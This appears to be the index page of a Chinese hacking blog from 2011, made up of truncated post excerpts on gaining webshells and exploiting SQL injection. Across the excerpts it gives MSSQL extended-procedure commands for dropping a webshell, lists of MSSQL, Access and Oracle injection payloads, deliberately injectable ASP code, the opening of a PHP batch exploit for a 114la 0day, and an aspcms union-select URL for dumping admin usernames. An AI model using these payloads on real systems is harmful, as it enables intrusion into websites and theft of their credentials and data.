3个MSSQL扩展,可用来获取WEBSHELL

   
分类:安全 | 2011-09-20 | 撸过 1,243 次
0人扯蛋

EXEC [master].[dbo].[xp_makecab] 'c:\test.rar','default',1,'d:\cmd.asp'

打包

EXEC [master].[dbo].[xp_unpackcab] 'C:\test.rar','c:',1, 'n.asp'

解包,可以用于得到webshell

EXEC [master].[dbo].[xp_readerrorlog] 1,'d:\cmd.asp'

读文本代码

 

要求权限:

master的dbo权限[......]

继续阅读

不常用的注入–利用IP地址进行注入

   
分类:安全 | 2011-09-18 | 撸过 1,327 次
1人扯蛋

 以前曾经QQ空间发布过关于IP注入攻击的文章,这种注入其实没什么神秘,只是很多时候被忽略了。
IP伪造有几种途径,一种是通过是修改IP数据包,有兴趣的可以去看看IP数据包的结构,还有一种就是利用修改http头信息来实现IP伪造。涉及到“客户端”IP的通常使用3个环境变量:$_SERVER['HTTP_CLIENT_IP']和$_SERVER['X_FORWARDED_FOR']还有$_SERVER['REMOTE_ADDR']实际上,这3个环境变量都有局限性。前两个是可以随意伪造。只要在发送的http头里设置相应值就可以,任意字符都可以,而第3个环境变量,如果用户使用了匿名代理,那这个[......]

继续阅读

'插入式' 注入技巧

   
分类:安全 | 2011-09-18 | 撸过 1,143 次
0人扯蛋

很不错的注入手法,今天发到这跟大家共享下。
不喜勿喷!
例:
http://www.webshell.cc/gaokao/ReadNews.asp?NewsID=3255'&BigClassName=&BigClassID=21&SmallClassID=42&SpecialID=0

试着在Newsid=3255后面插入“'”,结果报错。
“Microsoft OLE DB Provider for SQL Server 错误 '80040e14'
字符串 '' 之前有未闭合的引号。

明显存在注入漏洞,还是SQL数据库

无法动用工具查。 这点写工具的人,貌[......]

继续阅读

ASP ASPX PHP 构造注入页面的代码

   
分类:安全 | 2011-09-16 | 撸过 1,201 次
0人扯蛋

把下面的代码分别保存为ASP。PHP。ASPX

Mssql:

<!–#include file=”conn.asp”–>
<%
hid=request.QueryString(“id”)
sql=”select * from admin where id=”&hid
set rs=conn.execute (sql)
%>

Access:

<%
db=”aspzhuru.mdb”‘这里修改数据库路径或名称
Set conn = Server.CreateObject(“ADODB.Connection”)
dbpath=”Provider=Micr[......]

继续阅读

手工MSSQL注入常用SQL语句

   
分类:安全 | 2011-09-15 | 撸过 1,330 次
0人扯蛋

and exists (select * from sysobjects) //判断是否是MSSQL
and exists(select * from tableName) //判断某表是否存在..tableName为表名
and 1=(select @@VERSION) //MSSQL版本
And 1=(select db_name()) //当前数据库名
and 1=(select @@servername) //本地服务名
and 1=(select IS_SRVROLEMEMBER('sysadmin')) //判断是否是系统管理员
and 1=(Select IS_MEMBER('d[......]

继续阅读

注入命令

   
分类:安全 | 2011-09-13 | 撸过 824 次
0人扯蛋

_________________________________________________________________________
【测试注入
and 1=1
and 1=2
_________________________________________________________________________
【猜表一般表的名称无非是:admin adminuser user pass password】
and 0(select count(*) from *)
and 0(select count(*) from admin) //判断是否存在admin这张表[......]

继续阅读

Access注入点高级运用总结

   
分类:安全 | 2011-09-13 | 撸过 2,102 次
0人扯蛋

信赖Access注入点是人人看到最多的了,一样平常敷衍 办法就是:
猜表猜段猜内容---MD5---去靠山---看上传,备份,设置信息等等---上WEBSEHLL---提权.这是最常见和最普及 的ACCESS注入点应用行动 了.不外这里存在太多的不定因素,乐成 率非常低.任何一步失败,都也许让你不知怎样是好..

但是ACCESS就只有这么点能耐了么?答案是否定 的.下面我们来看看,都有哪些地方 是可以改善和进一步发挥 的.PS,我信赖行动 确定不止这些,只是创造的人都本身用着不公然 偷着乐罢了..

 
---------------------------------------[......]

继续阅读

Oracle 注入基础及相关特性总结

   
分类:安全 | 2011-09-12 | 撸过 2,261 次
0人扯蛋

1.判断是否存在注入点的方法和其他数据库类似,and 1=1 和and 1=2
2.判断数据库为oracle
提交注释字符/*,返回正常即是MySQL,否则继续提交注释符号--,该符号是Oracle和MsSQL支持的注释符,返回正常就需要继续判断。可以继续提交多语句支持符号;如果支持多行查询,说明是MSSQL,因为Oracle不支持多行查询,可以继续提交查询语句:

and exist(select * from dual)

and (select count(*) from user_tables)>0--

利用的原理是dual表和user_tables表是oracle中的系[......]

继续阅读

114啦注入0day批量

   
分类:安全 | 2011-09-7 | 撸过 1,219 次
0人扯蛋
<?php
$sbcopyright='
----------------------------------------
114la feedback injection Vul Exploit
By xZL
Team: www.0kee.com
2011.04.02

Usage: php '.$argv[0].' host /path
Example: php '.$argv[0].' 127.0.0.1 /
----------------------------------------
';
if ($argc < 3) {
print_r($sbcopyright);[......]

继续阅读

aspcms建站系统注入0day

   
分类:安全 | 2011-09-7 | 撸过 2,691 次
1人扯蛋

aspcms开发的全新内核的开源企业建站系统,能够胜任企业多种建站需求,并且

支持模版自定义、支持扩展插件等等,能够在短时间内完成企业建站。

漏洞文件:/plug/productbuy.asp

对接收的参数id没有进行过滤而导致的注入漏洞

注入后的页面有跳转,所以要快,建议用快捷键复制

爆用户名EXP:

https://www.webshell.cc/plug/productbuy.asp?id=2+union+select+1,2,LoginName,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,[......]

继续阅读